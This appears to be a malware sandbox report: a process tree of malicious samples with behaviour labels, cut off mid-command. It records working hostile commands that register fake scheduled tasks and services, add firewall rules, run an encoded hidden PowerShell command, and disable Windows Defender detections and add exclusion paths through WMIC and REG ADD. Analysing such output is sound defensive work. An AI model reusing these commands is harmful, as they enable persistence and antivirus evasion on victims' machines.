C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"6⤵
- Suspicious use of SetThreadContext
PID:12852 -
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe"7⤵
- Loads dropped DLL
- Checks processor information in registry
PID:10840 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build2.exe" & del C:\ProgramData\*.dll & exit8⤵PID:12816
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build2.exe /f9⤵
- Kills process with taskkill
PID:13352 -
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:12440 -
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"6⤵
- Suspicious use of SetThreadContext
PID:5128 -
C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"C:\Users\Admin\AppData\Local\744bebc2-f92a-4536-a0ff-9dbeaa32b558\build3.exe"7⤵PID:11364
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"8⤵
- Creates scheduled task(s)
PID:8720 -
C:\Users\Admin\AppData\Local\Temp\50E6.exeC:\Users\Admin\AppData\Local\Temp\50E6.exe2⤵PID:6020
-
C:\Users\Admin\AppData\Local\Temp\68D4.exeC:\Users\Admin\AppData\Local\Temp\68D4.exe2⤵
- Adds Run key to start application
PID:10112 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\ffihpkvc\3⤵PID:10080
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\oamuufuc.exe" C:\Windows\SysWOW64\ffihpkvc\3⤵PID:9812
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
- Suspicious use of SetThreadContext
PID:9828 -
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create ffihpkvc binPath= "C:\Windows\SysWOW64\ffihpkvc\oamuufuc.exe /d\"C:\Users\Admin\AppData\Local\Temp\68D4.exe\"" type= own start= auto DisplayName= "wifi support"3⤵PID:6704
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description ffihpkvc "wifi internet conection"3⤵PID:6264
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ffihpkvc3⤵PID:1208
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵PID:9312
-
C:\Users\Admin\oamuufuc.exe"C:\Users\Admin\oamuufuc.exe" /d"C:\Users\Admin\AppData\Local\Temp\68D4.exe"3⤵PID:5632
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\nhdjuewc.exe" C:\Windows\SysWOW64\ffihpkvc\4⤵PID:5492
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" config ffihpkvc binPath= "C:\Windows\SysWOW64\ffihpkvc\nhdjuewc.exe /d\"C:\Users\Admin\oamuufuc.exe\""4⤵PID:480
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start ffihpkvc4⤵PID:8112
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1780.bat" "4⤵PID:4160
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul4⤵PID:6032
-
C:\Users\Admin\AppData\Local\Temp\818D.exeC:\Users\Admin\AppData\Local\Temp\818D.exe2⤵
- Loads dropped DLL
PID:8560 -
C:\Users\Admin\AppData\Local\Temp\Q5ucksrMTF.exe"C:\Users\Admin\AppData\Local\Temp\Q5ucksrMTF.exe"3⤵PID:12440
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"4⤵
- Creates scheduled task(s)
PID:13036 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\818D.exe"3⤵PID:12496
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK4⤵
- Delays execution with timeout.exe
PID:10608 -
C:\Users\Admin\AppData\Local\Temp\B30E.exeC:\Users\Admin\AppData\Local\Temp\B30E.exe2⤵PID:4508
-
C:\Users\Admin\AppData\Local\Temp\BAC0.exeC:\Users\Admin\AppData\Local\Temp\BAC0.exe2⤵
- Suspicious use of SetThreadContext
PID:9624 -
C:\Users\Admin\AppData\Local\Temp\BAC0.exeC:\Users\Admin\AppData\Local\Temp\BAC0.exe3⤵PID:5256
-
C:\Users\Admin\AppData\Local\Temp\C3F8.exeC:\Users\Admin\AppData\Local\Temp\C3F8.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:9568 -
C:\Users\Admin\AppData\Local\Temp\E3F5.exeC:\Users\Admin\AppData\Local\Temp\E3F5.exe2⤵PID:6836
-
C:\Users\Admin\AppData\Local\Temp\E761.exeC:\Users\Admin\AppData\Local\Temp\E761.exe2⤵PID:9748
-
C:\Users\Admin\AppData\Local\Temp\E761.exe"C:\Users\Admin\AppData\Local\Temp\E761.exe"3⤵PID:7716
-
C:\Users\Admin\AppData\Local\Temp\F491.exeC:\Users\Admin\AppData\Local\Temp\F491.exe2⤵PID:6192
-
C:\Users\Admin\AppData\Local\Temp\D2B.exeC:\Users\Admin\AppData\Local\Temp\D2B.exe2⤵
- Loads dropped DLL
- Checks processor information in registry
- NTFS ADS
PID:6584 -
C:\ProgramData\SQWM6AN8HIEEB4JT.exe"C:\ProgramData\SQWM6AN8HIEEB4JT.exe"3⤵
- Drops startup file
PID:9052 -
C:\Users\Admin\AppData\Roaming\WinSupport\client32.exe"C:\Users\Admin\AppData\Roaming\WinSupport\client32.exe"4⤵
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:10936 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im D2B.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\D2B.exe" & del C:\ProgramData\*.dll & exit3⤵PID:8188
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im D2B.exe /f4⤵
- Kills process with taskkill
PID:13008 -
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:18944 -
C:\Users\Admin\AppData\Local\Temp\3749.exeC:\Users\Admin\AppData\Local\Temp\3749.exe2⤵PID:11228
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Browser1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2684 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:5036
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s WpnService1⤵PID:2628
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s IKEEXT1⤵PID:2344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s LanmanServer1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2336
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection1⤵PID:1956
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1404
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1344
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1216
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1096
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:1028 -
C:\Users\Admin\AppData\Roaming\ctghuggC:\Users\Admin\AppData\Roaming\ctghugg2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2144 -
C:\Users\Admin\AppData\Roaming\ctghuggC:\Users\Admin\AppData\Roaming\ctghugg2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:10444 -
C:\Users\Admin\AppData\Roaming\aeghuggC:\Users\Admin\AppData\Roaming\aeghugg2⤵
- Suspicious use of SetThreadContext
PID:10820 -
C:\Users\Admin\AppData\Roaming\aeghuggC:\Users\Admin\AppData\Roaming\aeghugg3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:16396 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵PID:12952
-
C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exeC:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe2⤵PID:12692
-
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"3⤵
- Creates scheduled task(s)
PID:17248 -
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exeC:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\wwgpFMiovwBgRpD\CNvEnVd.exe XY /site_id 668658 /S2⤵
- Drops file in System32 directory
PID:19268 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &3⤵PID:12124
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6468
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:12592
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:7084 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:14268
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6404
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:2280
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:17416 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:10512
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:6552
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True5⤵PID:11444
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Modifies data under HKEY_USERS
PID:17708 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:8968
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"4⤵PID:10552
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:7528 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True6⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:4124 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True7⤵PID:15656
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"3⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:9768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:14440
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:325⤵PID:14660
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:644⤵PID:15144
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:324⤵PID:15420
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:644⤵PID:15648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:324⤵PID:15832
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:644⤵PID:16120
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:324⤵PID:16312
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:644⤵PID:16480
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:16724
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:16948
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:324⤵PID:17224
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:644⤵PID:17480
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:324⤵PID:17648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:644⤵PID:17940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:324⤵PID:18096
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:644⤵PID:18236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:324⤵PID:18392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:644⤵PID:12016
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:324⤵PID:18452
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:644⤵PID:18496
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:324⤵PID:18520
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:644⤵PID:18572
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:324⤵PID:18612
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:644⤵PID:18900
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 